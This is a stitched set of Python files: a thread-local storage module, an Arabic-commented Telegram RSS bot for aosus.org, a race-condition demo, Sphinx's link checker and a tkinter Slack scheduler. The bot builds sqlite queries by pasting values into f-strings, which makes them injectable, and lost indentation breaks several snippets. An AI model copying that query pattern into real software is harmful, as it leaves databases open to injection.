What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = mydata.__dict__.items()
... items.sort()
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... initialized = False
... def __init__(self, **kw):
... if self.initialized:
... raise SystemError('__init__ called too many times')
... self.initialized = True
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red'), ('initialized', True)], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
# Threading import is at end
class _localbase(object):
__slots__ = '_local__key', '_local__args', '_local__lock'
def __new__(cls, *args, **kw):
self = object.__new__(cls)
key = '_local__key', 'thread.local.' + str(id(self))
object.__setattr__(self, '_local__key', key)
object.__setattr__(self, '_local__args', (args, kw))
object.__setattr__(self, '_local__lock', RLock())
        if (args or kw) and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
# We need to create the thread dict in anticipation of
        # __init__ being called, to make sure we don't call it
# again ourselves.
dict = object.__getattribute__(self, '__dict__')
currentThread().__dict__[key] = dict
return self
def _patch(self):
key = object.__getattribute__(self, '_local__key')
d = currentThread().__dict__.get(key)
if d is None:
d = {}
currentThread().__dict__[key] = d
object.__setattr__(self, '__dict__', d)
        # we have a new instance dict, so call our __init__ if we have
# one
cls = type(self)
if cls.__init__ is not object.__init__:
args, kw = object.__getattribute__(self, '_local__args')
cls.__init__(self, *args, **kw)
else:
object.__setattr__(self, '__dict__', d)
class local(_localbase):
def __getattribute__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__getattribute__(self, name)
finally:
lock.release()
def __setattr__(self, name, value):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__setattr__(self, name, value)
finally:
lock.release()
def __delattr__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__delattr__(self, name)
finally:
lock.release()
def __del__():
threading_enumerate = enumerate
__getattribute__ = object.__getattribute__
def __del__(self):
key = __getattribute__(self, '_local__key')
try:
threads = list(threading_enumerate())
except:
# if enumerate fails, as it seems to do during
# shutdown, we'll skip cleanup under the assumption
# that there is nothing to clean up
return
for thread in threads:
try:
__dict__ = thread.__dict__
except AttributeError:
# Thread is dying, rest in peace
continue
if key in __dict__:
try:
del __dict__[key]
except KeyError:
pass # didn't have anything in this thread
return __del__
__del__ = __del__()
from threading import currentThread, enumerate, RLock
|
main.py
|
import telebot
import os
import re
import threading
import feedparser
import sqlite3
import time
from config import TOKEN, super_users
from make_db import tablesName
bot = telebot.TeleBot(TOKEN)
bot_id = bot.get_me().id
bot_username = '@'+bot.get_me().username
url = "https://aosus.org/latest.rss"
sleep = 15
# Check that the database file exists
if os.path.lexists("./db.sqlite3"):
coon = sqlite3.connect('./db.sqlite3', check_same_thread=False)
cursor = coon.cursor()
lock = threading.Lock()
else:
print("make database first form 'make_db.py'")
quit()
if os.path.lexists("./last_id.txt"):
pass
else:
with open('./last_id.txt','w+') as f:
pass
def insert(table_name:str, args_:tuple):
""" ادخال البيانات داخل قاعدة البيانات
المتغيرات:
table_name (str): اسم الجدول المراد ادخال البيانات فيه
args_ (tuple): القيم التي سوف تملي بها الاعمدة الخاصة بالجدول
"""
try:
lock.acquire(True)
args = tuple(map(str, args_))
first_element = f"('{args[0]}')"
cursor.execute(f"INSERT INTO {table_name} ({','.join(tablesName[table_name])}) VALUES {tuple(args) if len(args) > 1 else first_element}")
coon.commit()
finally:
lock.release()
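# Illustrative sketch (not part of the original bot): the same insert written with
# sqlite3 parameter placeholders instead of string formatting. Placeholders only
# cover values, so the table and column names still have to be interpolated.
def insert_params(table_name: str, args_: tuple):
    with lock:
        values = tuple(map(str, args_))
        placeholders = ','.join('?' for _ in values)
        cursor.execute(
            f"INSERT INTO {table_name} ({','.join(tablesName[table_name])}) VALUES ({placeholders})",
            values)
        coon.commit()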
def get_column(table_name:str, column:str):
""" ترجع لك جميع القيم التي في العامود المعطى
المتغيرات:
table_name (str): اسم الجدول اذي يوجد فيه العامود
column (str): اسم العامود الذي تريد اسخراج جميع القيم التي به
المخرجات:
list: قائمة من عناصر العامود
"""
try:
lock.acquire(True)
cursor.execute(f"SELECT {column} FROM {table_name}")
return [val for table in cursor.fetchall() for val in table]
finally:
lock.release()
def del_row(table_name:str, column:str, value:str):
""" حذف صف من قاعدة البيانات
المتغيرات:
table_name (str): اسم الجدول الذي يوجد به العامود
column (str): اسم العامود الذي يوجد به الصف
value (str): القيمة التي تريد مسحها الموجودة في العامود
"""
try:
lock.acquire(True)
cursor.execute(f"DELETE FROM {table_name} WHERE {column}='{value}'")
coon.commit()
finally:
lock.release()
def update(table_name:str, column:str, new_value:str, where_column:str, where_value:str) -> None:
""" تعديل صف في قاعدة البيانات
المتغيرات:
table_name (str): اسم الجدول.
column (str): العمود الذي تريد تحديثه.
new_value (str): القيمة الجديدة.
where_column (str): where_value العمود الذي يوجد به.
where_value (str): where_column القيمة الموجودة في.
"""
try:
lock.acquire(True)
cursor.execute(f"UPDATE {table_name} SET '{column}'= '{new_value}' WHERE {where_column} = '{where_value}'")
coon.commit()
finally:
lock.release()
def row(table_name:str, column:str, word:str, want='*', lst=True):
""" جلب صف من قاعدة البيانات
المتغيرات:
table_name (str): اسم الجدول الذي يوجد به العمود
column (str): اسم العمود اذي يوجد به الصف
word (str): القيمة الموجود في العمود
want (str, optional): word العمود الذي تريده من الصف الذي يوجد به العمود الي قيمته. Defaults to '*'.
lst (bool, optional): اخراج المعطيات كلستة ام تيبل. Defaults to 'True'.
المخرجات:
[list,tuple,str,None]: قائمة بالنتائج او عنصر او لاشي اذ لم تكن هناك نتائج
"""
try:
lock.acquire(True)
cursor.execute(f"SELECT {want} FROM {table_name} WHERE {column}='{word}'")
if lst:
result = list(map(
lambda val: str(val).replace('<br>', '\n'),
[val for t in cursor.fetchall() for val in t]
))
else:
result = list(map(
lambda t: tuple(str(val) for val in t),
[t for t in cursor.fetchall()]
))
if lst:
if (len(result) == 0):
return None
elif (len(result) == 1):
return result[0] if lst else result[0][0]
else:
                pass  # the last line will run and return all the results
else:
            pass  # the last line will run and return all the results
return result
finally:
lock.release()
def get_latest_news():
""" https://aosus.org/latest ارجاع اخر موضوع من
المخرجات:
dict: تفاصيل اخر موضوع
"""
return feedparser.parse(url).entries[0]
def get_last_id():
""" ارجاع ايدي اخر موضوع تم ارساله
المخرجات:
str: ايدي اخر موضوع تم ارساله
"""
with open('./last_id.txt','r') as f:
last_id = f.read()
return last_id
def add_id(news_id:str):
""" './last_id.txt' اضافة ايدي اخر منشور هنا
المتغيرات:
news_id (str): ايدي الموضوع الجديد
"""
with open('./last_id.txt', 'w') as f:
f.write(news_id)
def get_is_admin(chat_id:int, user_id:int):
""" ارجاع اذا كان الشخص ادمن في المحادثة
المتغيرات:
chat_id (int): ايدي الرسالة
user_id (int): ايدي الشخص
المخرجات:
bool: user id admin in chat_id
"""
    # If the chat ID equals the user ID,
    # this means the chat is a private one
if chat_id == user_id:
        # return True because a user is an admin of their own private chat
return True
else:
        # the map returns the IDs of the chat administrators
return user_id in map(lambda user: user.user.id, bot.get_chat_administrators(chat_id))
def convert_status(chat_id:int, new_status:str, msg_id:int = None):
""" حذف او اضافة العضو الى قاعدة البيانات
المتغيرات:
chat_id (int): ايدي الشخص المراد حذفه او اضافته
new_status (str): الحالة الجديدة (on, off)
msg_id (int, optional): ايدي الرسالة للرد عليها. Defaults to None.
"""
status = 'on' if str(chat_id) in get_column('chats', 'id') else 'off'
if status == new_status:
bot.send_message(chat_id, "هذه هي حالة البوت في هذه المحادثة بالفعل",
reply_to_message_id=msg_id)
else:
if new_status == 'on':
bot.send_message(chat_id, "تم تفعيل الاشتراك", reply_to_message_id=msg_id)
insert('chats', (chat_id,))
else:
bot.send_message(chat_id, "تم الغاء تفعيل الاشتراك", reply_to_message_id=msg_id)
del_row('chats', 'id', str(chat_id))
def cleanhtml(raw_html:str):
""" html تنظيف النص من تاقات ال
المتغيرات:
raw_html (str): html نص ال
Returns:
str: html نص نظيف لايحتوي على تاقات ال
"""
cleanr = re.compile('<.*?>')
cleantext = re.sub(cleanr, '', raw_html)
return cleantext
def get_last_text():
""" ارجاع نص اخر موضوع
المخرجات:
str: نص اخر موضوع
"""
feed = get_latest_news()
title = feed['title']
author = feed['author']
tag = feed['tags'][0]['term']
summary = cleanhtml( feed['summary']).strip()
split_summary = summary.split()
    # strip image names such as picture_name@4x5444×3062 64.6 KB
if '@' in split_summary[0] and '×' in split_summary[0]:
summary = ' '.join(split_summary[3:])
else:
pass
    # keep everything up to the last complete word
summary = summary[:summary.strip('\n').find(' ', 55)]+'...'
link = feed['link']
text = f"من {author} \n\n <b><a href='{link}'>{title}</a></b> \n\n <code>{summary}</code> \n\nالقسم:{tag}"
return text
def add_replies(key:str, value:str):
""" اضافة رد الى قاعدة البيانات
المتغيرات:
key (str): الامر لاستدعاء الرد
value (str): الرد
"""
key = str(key).replace('\n', '<br>')
value = str(value).replace('\n', '<br>')
key = key if key.startswith('/') else '/'+key
insert('replies', (key, value))
def del_replies(word: str):
""" مسح رد من قاعدة البيانات
المتغيرات:
word (str): الكلمة الذي تشير الى الرد
"""
del_row("replies", "key", word)
def update_replies(word: str, new_val: str):
""" تعديل على محتوى الرد
المتغيرات:
word (str): الكلمة التي تشير الى الرد المراد تعديله
new_val (str): القيمة الجديدة للرد
"""
update("replies", 'value', str(new_val).replace('\n', '<br>'), 'key', word)
def get_replies(word: str = None):
""" جلب الرد من قاعدة البيانات
المتغيرات:
word (str): الكلمة التي تشير الى الرد
"""
if word:
return str(row("replies", 'key', word, 'value')).replace('<br>', '\n')
else:
return get_column("replies", 'key')
def replie(word: str, status: str, rep: str = None):
""" دالة لادارة جدول الردور
المتغيرات:
word (str): الكلمة التي تشير الى الرد
status (str): الحالة ["add", "del", "update"] or 1, 2, 3
rep (str, optional): الرد الخاص بالكلمة. Defaults to None.
Raises:
ValueError: قيمة خاطئة للحالة
"""
status_cases = ["add", "del", "update", 1, 2, 3]
find_word = any(map(lambda w: w == word,
get_replies()))
if status in status_cases:
if status in ["add", 1]:
if find_word:
return False
else:
add_replies(word, rep)
return True
elif status in ["del", 2]:
if not find_word:
return False
else:
del_replies(word)
return True
else:
if not find_word:
return False
else:
update_replies(word, rep)
return True
else:
        raise ValueError("Invalid value, status must be {}".format(' or '.join(map(str, status_cases))))
def send_to_users():
"""
    Send the topic to the bot's subscribers.
"""
text = "موضوع جديد على مجتمع اسس "+get_last_text()
for chat_id in get_column('chats', 'id'):
try:
bot.send_message(chat_id, text, parse_mode="HTML")
        # if the bot was kicked or blocked, remove the subscriber from the database
except Exception:
convert_status(chat_id, new_status='off')
def main_loop():
"""
    An infinite loop runs here; whenever a new
    topic ID is found, the topic is published.
"""
while True:
        # check that there are subscribers in the database
if len(get_column('chats', 'id')) != 0:
feed = get_latest_news()
if feed.id != get_last_id():
add_id(feed.id)
send_to_users()
else:
pass
else:
pass
time.sleep(sleep)
@bot.edited_message_handler(func= lambda msg: msg.text)
@bot.message_handler(content_types=["new_chat_members"])
@bot.message_handler(func=lambda msg: msg.text)
def message_handler(message):
chat_id = message.chat.id
user_id = message.from_user.id
first_name = message.from_user.first_name
msg_id = message.id
is_private_chat = message.chat.type == "private"
is_admin = get_is_admin(chat_id, user_id)
is_superuser = user_id in super_users
reply_text = message.reply_to_message.html_text if message.reply_to_message else None
new_chat_member_id = message.new_chat_members[0].id if message.new_chat_members else None
start_msg = "\nهذا البوت مخصص لارسال اخر المواضيع الخاصة بمجتمع اسس للبرامج الحرة والمفتوحة.\nلتفعيل الاشتراك: /on\nاذا اردت الغاء الاشتراك : /off\n\n\nhttps://aosus.org"
add_replies_help = "لاضافة او تعديل رد\nيمكنك عمل رد على الرسالة بـ 'اضافة/تعديل رد-<اسم الرد>'\nمثال: اضافة/تعديل رد-تجربة\nلاضافة بدون رد 'اضافة/تعديل رد-<الرد>-<محتوى الرد>'\nمثال: اضافة رد-تجربة-هذا الرد للتجربة\n للمسح: مسح رد <اسم الرد>"
if not new_chat_member_id:
        # remove the bot's username from the command if present
text = message.text.replace(bot_username, '').lower()
        # the text split into parts
s_text = list(map(str.strip, text.strip('-').split('-')))
if s_text[0].strip() in ['اضافة رد', 'تعديل رد', 'مسح رد'] and is_superuser:
status = ['اضافة رد', 'مسح رد', 'تعديل رد'].index(s_text[0].strip()) + 1
if len(s_text) >= 2:
                if len(s_text) == 2 and not reply_text and status != 2:  # status 2 is 'delete reply'
bot.reply_to(message, "يوجد خطأ لمعرفة طريقة الاستخدام ارسل \n /help")
else:
word = s_text[1].strip()
rep = s_text[2].strip() if len(s_text) >= 3 else reply_text if reply_text else None
done = replie(word, status, rep)
if done:
bot.reply_to(message, "تم {} الرد بنجاح".format(
s_text[0].split()[0]
))
else:
bot.reply_to(message, "هناك مشكلة، لايمكن {} {} {}".format(
s_text[0].split()[0], word,
"موجود بالفعل" if status == 1 else "ليس موجود",
))
else:
bot.reply_to(message, "يوجد خطأ لمعرفة طريقة الاستخدام ارسل \n /help")
if text.startswith(('/on', '/off')):
if is_private_chat:
                # [1:] means removing the leading slash
convert_status(chat_id, new_status=text[1:], msg_id=msg_id)
else:
if is_admin:
                    # [1:] means removing the leading slash
convert_status(chat_id, new_status=text[1:], msg_id=msg_id)
else:
bot.reply_to(message, "يجب ان تكون ادمن لكي تقوم بهذا الامر")
        # the start command works only in private chats
elif text.startswith('/start') and is_private_chat:
text = f"اهلا بك <a href='tg://user?id={user_id}'>{first_name}</a>"+start_msg.format(name=first_name, id=user_id)
bot.reply_to(message, text, parse_mode="HTML")
        # the help command works in both group and private chats
elif text.startswith('/help'):
text = "اهلا بك في خدمة ارسال اخر المواضيع الخاصة بمجتمع اسس للبرامج الحرة والمفتوحة..\nللاشتراك ارسل: /on\nولالغاء الاشتراك ارسل: /off\nلرؤية الردود: الردود\n\n\n"
if is_superuser:
text = text+add_replies_help
else:
text = text+"https://aosus.org"
bot.reply_to(message, text)
        # the last-topic command works in both group and private chats
elif text.startswith('/last_topic'):
if is_admin:
bot.reply_to(message, get_last_text(), parse_mode="HTML")
else:
bot.reply_to(message, "يجب ان تكون ادمن لكي تقوم بهذا الامر")
else:
if text == 'الردود':
if len(get_replies()) != 0:
text = telebot.util.smart_split('\n'.join(get_replies()), 3000)
for t in text:
bot.reply_to(message,t)
else:
bot.reply_to(message, "لايوجد ردود في البوت")
elif text in get_replies():
bot.reply_to(message, get_replies(text), parse_mode="HTML")
else:
        # if the newest member is the bot itself
if new_chat_member_id == bot_id:
text = f"شكرا <a href='tg://user?id={user_id}'>{first_name}</a> لاضافتي الى المحادثة 🌹\n{start_msg.format(name=first_name, id=user_id)}"
bot.send_message(chat_id, text, parse_mode="HTML")
else:
pass
# start the bot
threading.Thread(target=main_loop).start()
while True:
print(f"Start {bot.get_me().first_name}")
try:
bot.polling(none_stop=True, interval=0, timeout=0)
except Exception as err:
print(err)
time.sleep(10)
|
counter_race.py
|
import time
import random
import threading
COUNTER = 0
def update():
global COUNTER
read_value = COUNTER # reading in the shared resource
time.sleep(random.randint(0, 1)) # simulating heavy calculations
COUNTER = read_value + 1
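# Illustrative sketch (not part of the original script): the same increment with the
# read-modify-write guarded by a threading.Lock, which removes the lost-update race
# demonstrated by update(). Pointing the threads below at locked_update instead of
# update would make the final counter always reach the number of threads.
LOCK = threading.Lock()
def locked_update():
    global COUNTER
    with LOCK:  # only one thread at a time may read and modify COUNTER
        read_value = COUNTER
        time.sleep(random.randint(0, 1))  # the delay can no longer cause lost updates
        COUNTER = read_value + 1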
if __name__ == '__main__':
threads = [threading.Thread(target=update) for _ in range(20)]
for t in threads:
t.start()
for t in threads:
t.join()
print(f'Final counter value: {COUNTER}')
|
linkcheck.py
|
# -*- coding: utf-8 -*-
"""
sphinx.builders.linkcheck
~~~~~~~~~~~~~~~~~~~~~~~~~
The CheckExternalLinksBuilder class.
:copyright: Copyright 2007-2018 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
import socket
import threading
from os import path
from docutils import nodes
from requests.exceptions import HTTPError
from six.moves import queue, html_parser
from six.moves.urllib.parse import unquote
# 2015-06-25 barry@python.org. This exception was deprecated in Python 3.3 and
# removed in Python 3.5, however for backward compatibility reasons, we're not
# going to just remove it. If it doesn't exist, define an exception that will
# never be caught but leaves the code in check_anchor() intact.
try:
from six.moves.html_parser import HTMLParseError # type: ignore
except ImportError:
class HTMLParseError(Exception): # type: ignore
pass
from sphinx.builders import Builder
from sphinx.locale import __
from sphinx.util import encode_uri, requests, logging
from sphinx.util.console import ( # type: ignore
purple, red, darkgreen, darkgray, darkred, turquoise
)
from sphinx.util.requests import is_ssl_error
if False:
# For type annotation
from typing import Any, Dict, List, Set, Tuple, Union # NOQA
from sphinx.application import Sphinx # NOQA
from sphinx.util.requests.requests import Response # NOQA
logger = logging.getLogger(__name__)
class AnchorCheckParser(html_parser.HTMLParser):
"""Specialized HTML parser that looks for a specific anchor."""
def __init__(self, search_anchor):
# type: (unicode) -> None
html_parser.HTMLParser.__init__(self)
self.search_anchor = search_anchor
self.found = False
def handle_starttag(self, tag, attrs):
# type: (Any, Any) -> None
for key, value in attrs:
if key in ('id', 'name') and value == self.search_anchor:
self.found = True
break
def check_anchor(response, anchor):
# type: (Response, unicode) -> bool
"""Reads HTML data from a response object `response` searching for `anchor`.
Returns True if anchor was found, False otherwise.
"""
parser = AnchorCheckParser(anchor)
try:
# Read file in chunks. If we find a matching anchor, we break
# the loop early in hopes not to have to download the whole thing.
for chunk in response.iter_content(chunk_size=4096, decode_unicode=True):
parser.feed(chunk)
if parser.found:
break
parser.close()
except HTMLParseError:
# HTMLParser is usually pretty good with sloppy HTML, but it tends to
# choke on EOF. But we're done then anyway.
pass
return parser.found
class CheckExternalLinksBuilder(Builder):
"""
Checks for broken external links.
"""
name = 'linkcheck'
epilog = __('Look for any errors in the above output or in '
'%(outdir)s/output.txt')
def init(self):
# type: () -> None
self.to_ignore = [re.compile(x) for x in self.app.config.linkcheck_ignore]
self.anchors_ignore = [re.compile(x)
for x in self.app.config.linkcheck_anchors_ignore]
self.good = set() # type: Set[unicode]
self.broken = {} # type: Dict[unicode, unicode]
self.redirected = {} # type: Dict[unicode, Tuple[unicode, int]]
# set a timeout for non-responding servers
socket.setdefaulttimeout(5.0)
# create output file
open(path.join(self.outdir, 'output.txt'), 'w').close()
# create queues and worker threads
self.wqueue = queue.Queue() # type: queue.Queue
self.rqueue = queue.Queue() # type: queue.Queue
self.workers = [] # type: List[threading.Thread]
for i in range(self.app.config.linkcheck_workers):
thread = threading.Thread(target=self.check_thread)
thread.setDaemon(True)
thread.start()
self.workers.append(thread)
def check_thread(self):
# type: () -> None
kwargs = {
'allow_redirects': True,
'headers': {
'Accept': 'text/html,application/xhtml+xml;q=0.9,*/*;q=0.8'
},
}
if self.app.config.linkcheck_timeout:
kwargs['timeout'] = self.app.config.linkcheck_timeout
def check_uri():
# type: () -> Tuple[unicode, unicode, int]
# split off anchor
if '#' in uri:
req_url, anchor = uri.split('#', 1)
for rex in self.anchors_ignore:
if rex.match(anchor):
anchor = None
break
else:
req_url = uri
anchor = None
# handle non-ASCII URIs
try:
req_url.encode('ascii')
except UnicodeError:
req_url = encode_uri(req_url)
try:
if anchor and self.app.config.linkcheck_anchors:
# Read the whole document and see if #anchor exists
response = requests.get(req_url, stream=True, config=self.app.config,
**kwargs)
found = check_anchor(response, unquote(anchor))
if not found:
raise Exception(__("Anchor '%s' not found") % anchor)
else:
try:
# try a HEAD request first, which should be easier on
# the server and the network
response = requests.head(req_url, config=self.app.config, **kwargs)
response.raise_for_status()
except HTTPError:
# retry with GET request if that fails, some servers
# don't like HEAD requests.
response = requests.get(req_url, stream=True, config=self.app.config,
**kwargs)
response.raise_for_status()
except HTTPError as err:
if err.response.status_code == 401:
# We'll take "Unauthorized" as working.
return 'working', ' - unauthorized', 0
else:
return 'broken', str(err), 0
except Exception as err:
if is_ssl_error(err):
return 'ignored', str(err), 0
else:
return 'broken', str(err), 0
if response.url.rstrip('/') == req_url.rstrip('/'):
return 'working', '', 0
else:
new_url = response.url
if anchor:
new_url += '#' + anchor
# history contains any redirects, get last
if response.history:
code = response.history[-1].status_code
return 'redirected', new_url, code
else:
return 'redirected', new_url, 0
def check():
# type: () -> Tuple[unicode, unicode, int]
# check for various conditions without bothering the network
if len(uri) == 0 or uri.startswith(('#', 'mailto:', 'ftp:')):
return 'unchecked', '', 0
elif not uri.startswith(('http:', 'https:')):
return 'local', '', 0
elif uri in self.good:
return 'working', 'old', 0
elif uri in self.broken:
return 'broken', self.broken[uri], 0
elif uri in self.redirected:
return 'redirected', self.redirected[uri][0], self.redirected[uri][1]
for rex in self.to_ignore:
if rex.match(uri):
return 'ignored', '', 0
# need to actually check the URI
for _ in range(self.app.config.linkcheck_retries):
status, info, code = check_uri()
if status != "broken":
break
if status == "working":
self.good.add(uri)
elif status == "broken":
self.broken[uri] = info
elif status == "redirected":
self.redirected[uri] = (info, code)
return (status, info, code)
while True:
uri, docname, lineno = self.wqueue.get()
if uri is None:
break
status, info, code = check()
self.rqueue.put((uri, docname, lineno, status, info, code))
def process_result(self, result):
# type: (Tuple[unicode, unicode, int, unicode, unicode, int]) -> None
uri, docname, lineno, status, info, code = result
if status == 'unchecked':
return
if status == 'working' and info == 'old':
return
if lineno:
logger.info('(line %4d) ', lineno, nonl=1)
if status == 'ignored':
if info:
logger.info(darkgray('-ignored- ') + uri + ': ' + info)
else:
logger.info(darkgray('-ignored- ') + uri)
elif status == 'local':
logger.info(darkgray('-local- ') + uri)
self.write_entry('local', docname, lineno, uri)
elif status == 'working':
logger.info(darkgreen('ok ') + uri + info)
elif status == 'broken':
self.write_entry('broken', docname, lineno, uri + ': ' + info)
if self.app.quiet or self.app.warningiserror:
logger.warning(__('broken link: %s (%s)'), uri, info,
location=(self.env.doc2path(docname), lineno))
else:
logger.info(red('broken ') + uri + red(' - ' + info))
elif status == 'redirected':
text, color = {
301: ('permanently', darkred),
302: ('with Found', purple),
303: ('with See Other', purple),
307: ('temporarily', turquoise),
0: ('with unknown code', purple),
}[code]
self.write_entry('redirected ' + text, docname, lineno,
uri + ' to ' + info)
logger.info(color('redirect ') + uri + color(' - ' + text + ' to ' + info))
def get_target_uri(self, docname, typ=None):
# type: (unicode, unicode) -> unicode
return ''
def get_outdated_docs(self):
# type: () -> Set[unicode]
return self.env.found_docs
def prepare_writing(self, docnames):
# type: (nodes.Node) -> None
return
def write_doc(self, docname, doctree):
# type: (unicode, nodes.Node) -> None
logger.info('')
n = 0
for node in doctree.traverse(nodes.reference):
if 'refuri' not in node:
continue
uri = node['refuri']
lineno = None
while lineno is None:
node = node.parent
if node is None:
break
lineno = node.line
self.wqueue.put((uri, docname, lineno), False)
n += 1
done = 0
while done < n:
self.process_result(self.rqueue.get())
done += 1
if self.broken:
self.app.statuscode = 1
def write_entry(self, what, docname, line, uri):
# type: (unicode, unicode, int, unicode) -> None
with open(path.join(self.outdir, 'output.txt'), 'a', # type: ignore
encoding='utf-8') as output:
output.write("%s:%s: [%s] %s\n" % (self.env.doc2path(docname, None),
line, what, uri))
def finish(self):
# type: () -> None
for worker in self.workers:
self.wqueue.put((None, None, None), False)
def setup(app):
# type: (Sphinx) -> Dict[unicode, Any]
app.add_builder(CheckExternalLinksBuilder)
app.add_config_value('linkcheck_ignore', [], None)
app.add_config_value('linkcheck_retries', 1, None)
app.add_config_value('linkcheck_timeout', None, None, [int])
app.add_config_value('linkcheck_workers', 5, None)
app.add_config_value('linkcheck_anchors', True, None)
# Anchors starting with ! are ignored since they are
# commonly used for dynamic pages
app.add_config_value('linkcheck_anchors_ignore', ["^!"], None)
return {
'version': 'builtin',
'parallel_read_safe': True,
'parallel_write_safe': True,
}
|
gui_tools.py
|
import tkinter as tk
import schedule
import time
import queue
import threading
from slack_app.slack_message import *
class CheckBar(tk.Frame):
def __init__(self, options_list, parent=None, side=tk.TOP, anchor=tk.W):
tk.Frame.__init__(self, parent)
self.vars = list()
for opt in options_list:
var = tk.IntVar()
chk = tk.Checkbutton(self, text=opt, variable=var)
chk.pack(side=side, anchor=anchor)
self.vars.append(var)
def state(self):
return map((lambda var: var.get()), self.vars)
def center(win):
"""
centers a tkinter window
:param win: the root or Toplevel window to center
"""
win.update_idletasks()
width = win.winfo_width()
frm_width = win.winfo_rootx() - win.winfo_x()
win_width = width + 2 * frm_width
height = win.winfo_height()
titlebar_height = win.winfo_rooty() - win.winfo_y()
win_height = height + titlebar_height + frm_width
x = win.winfo_screenwidth() // 2 - win_width // 2
y = win.winfo_screenheight() // 2 - win_height // 2
win.geometry('{}x{}+{}+{}'.format(width, height, x, y))
win.deiconify()
def include_greetings():
    u_selection = None
    def user_click(button_id):
        nonlocal u_selection
        if button_id == 'cancel':
            u_selection = 'cancel'
        else:
            u_selection = 'submit'
        root.destroy()
root = tk.Tk()
root.attributes("-topmost", True)
root.title("Greetings App")
winroot = tk.Frame(root)
winroot.pack(side="top", fill="both", expand=True)
tk.Label(winroot, text="COMPLETE AND SELECT THE OPTIONS"). \
pack(pady=(1, 10), padx=(4, 4))
# Channel
selected_channel = tk.StringVar(winroot)
tk.Label(winroot, text="Channel (include '#' or '@')").pack()
tk.Entry(winroot, textvariable=selected_channel).pack(pady=(1, 5))
# Message
selected_message = tk.StringVar(winroot)
tk.Label(winroot, text="Message").pack()
tk.Entry(winroot, textvariable=selected_message).pack(pady=(1, 5))
# Time request
selected_time = tk.StringVar(winroot)
tk.Label(winroot, text="Time of the Day (hh:mm)").pack()
tk.Entry(winroot, textvariable=selected_time).pack(pady=(1, 5))
# Days of the week
weekdays = [
"Monday", "Tuesday", "Wednesday", "Thursday",
"Friday", "Saturday", "Sunday"
]
tk.Label(winroot, text="Weekdays to send the message").pack()
cb = CheckBar(weekdays, winroot)
cb.pack()
tk.Button(winroot, text="Cancel", command=lambda: user_click('cancel')). \
pack(side=tk.LEFT)
tk.Button(winroot, text="Submit", command=lambda: user_click('submit')).\
pack(side=tk.RIGHT)
center(root)
winroot.mainloop()
return (u_selection,
selected_channel.get(),
selected_message.get(),
selected_time.get(),
[day for (day, state) in zip(weekdays, list(cb.state())) if state == 1])
def info_message(message):
winroot = tk.Tk()
winroot.geometry("300x200")
winroot.attributes("-topmost", True)
winroot.title("Info")
tk.Label(winroot, text=message).pack()
tk.Button(winroot, text='OK', command=winroot.destroy).pack(side=tk.BOTTOM)
center(winroot)
winroot.mainloop()
class GuiPart(object):
def __init__(self, master, queue, end_command):
self.queue = queue
# Set up the GUI
tk.Button(master, text='Stop', command=end_command).pack(side=tk.BOTTOM)
# Add more GUI stuff here depending on your specific needs
def processIncoming(self):
""" Handle all messages currently in the queue, if any. """
while self.queue.qsize():
try:
msg = self.queue.get_nowait()
# Check contents of message and do whatever is needed. As a
# simple example, let's print it (in real life, you would
# suitably update the GUI's display in a richer fashion).
print(msg)
except queue.Empty:
# just on general principles, although we don't expect this
# branch to be taken in this case, ignore this exception!
pass
class ThreadedJob(object):
"""
Launch the main part of the GUI and the worker thread. periodic_call()
and end_application() could reside in the GUI part, but putting them
here means that you have all the thread controls in a single place.
"""
def __init__(self, master):
"""
Start the GUI and the asynchronous threads. We are in the main
(original) thread of the application, which will later be used by
the GUI as well. We spawn a new thread for the worker (I/O).
"""
self.master = master
# Create the queue
self.queue = queue.Queue()
# Set up the GUI part
self.gui = GuiPart(master, self.queue, self.end_application)
# Set up the thread to do asynchronous I/O
# More threads can also be created and used, if necessary
self.running = True
self.thread1 = threading.Thread(target=self.worker_thread1)
self.thread1.start()
# Start the periodic call in the GUI to check the queue
self.periodic_call()
def periodic_call(self):
""" Check every 200 ms if there is something new in the queue. """
self.master.after(200, self.periodic_call)
self.gui.processIncoming()
if not self.running:
# This is the brutal stop of the system. You may want to do
# some cleanup before actually shutting it down.
import sys
sys.exit(1)
def worker_thread1(self):
"""
This is where we handle the asynchronous I/O. For example, it may be
a 'select()'. One important thing to remember is that the thread has
to yield control pretty regularly, be it by select or otherwise.
"""
while self.running:
# Execute jobs until stopped
#time.sleep(rand.random() * 1.5)
#msg = rand.random()
schedule.run_pending()
time.sleep(1)
#self.queue.put(msg)
def end_application(self):
        self.running = False  # Stops worker_thread1 (invoked by the 'Stop' button).
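# Illustrative usage sketch (not part of the original module): how ThreadedJob is
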